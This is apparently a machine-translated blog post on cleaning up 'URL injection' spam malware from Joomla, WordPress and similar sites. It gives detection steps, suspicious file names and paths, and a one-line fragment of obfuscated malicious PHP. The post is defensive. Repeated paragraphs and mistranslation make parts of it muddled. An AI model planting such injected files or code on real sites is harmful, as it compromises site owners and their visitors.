Implementation via URL: www.site.ru/?jn=xxxxxxxx
Just the other day, I came across a new (*?) Version of spam virus for websites. Google defines it as "URL injection."
Links appear on your site that weren’t and couldn’t be - for example, you clearly know the structure of the site and the original look of the URL, which differs from the "left" URLs. In particular, links of the form appear in the index of search engines:
Yandex Webmaster has not yet responded to them, but in Google’s tools for webmasters a warning is issued about a possible hacking of the site. Search recommendations are also given there. Unfortunately, they are quite general and a specific search for a problem takes time. Antiviruses and on-line analyzers of sites - do not give a result. Only pens.
The full code of the (unfocused) malicious code under the cut.
Most likely 3 options:
Description
Links appear on your site that weren’t and couldn’t be - for example, you clearly know the structure of the site and the original look of the URL, which differs from the "left" URLs. In particular, links of the form appear in the index of search engines:
www.site.ru/?jn=xxxxxxxx
Troubleshooting
Yandex Webmaster has not yet responded to them, but in Google’s tools for webmasters a warning is issued about a possible hacking of the site. Search recommendations are also given there. Unfortunately, they are quite general and a specific search for a problem takes time. Antiviruses and on-line analyzers of sites - do not give a result. Only pens.
Option A: Code Not Obfuscated
- We are looking in the source who and how we use the variable $ _GET ['jn']
- Next, by the code, we look at who craps where (for example: \ js \ swfupload \ plugins \ jquery \)
Option B: Code Obfuscated
- We are looking for a directory with files whose names come after "? Jn ="
- We are looking for suspicious executable files like images / c0nfv.php
- You can search for paths where there may be files a la "/img/icon/thumb/jquery.php"
- Check CMS Config Date
- It is recommended to check for the presence (correctness) of the base.php files - this is the body of the virus, the code is obfuscated
- We check the date of jquery.php and compare it with the date of the virus detection by monitoring Google’s webmasters tools.
Meets
- CMS: Joomla, WordPress, DLE, PrestaShop, HostCMS
- Plugins: ImageZoomer, SWFupload, BlockCategories
- There is a high probability of occurrence in almost all plugins that use jQuery and in those places where admins haven’t reached the settings.
The full code of the (unfocused) malicious code under the cut.
'.join("",file($ftdavmbe."/$uhvuusgp")).'
Reasons for hacking
Most likely 3 options:
- Open directory for recording on the server;
- Vulnerability in the software that runs on the site, as a rule, these are free CMS (content management systems). For example, if you are using an outdated and insecure version;
- Hack third-party plugins on the site (working with JQUERY).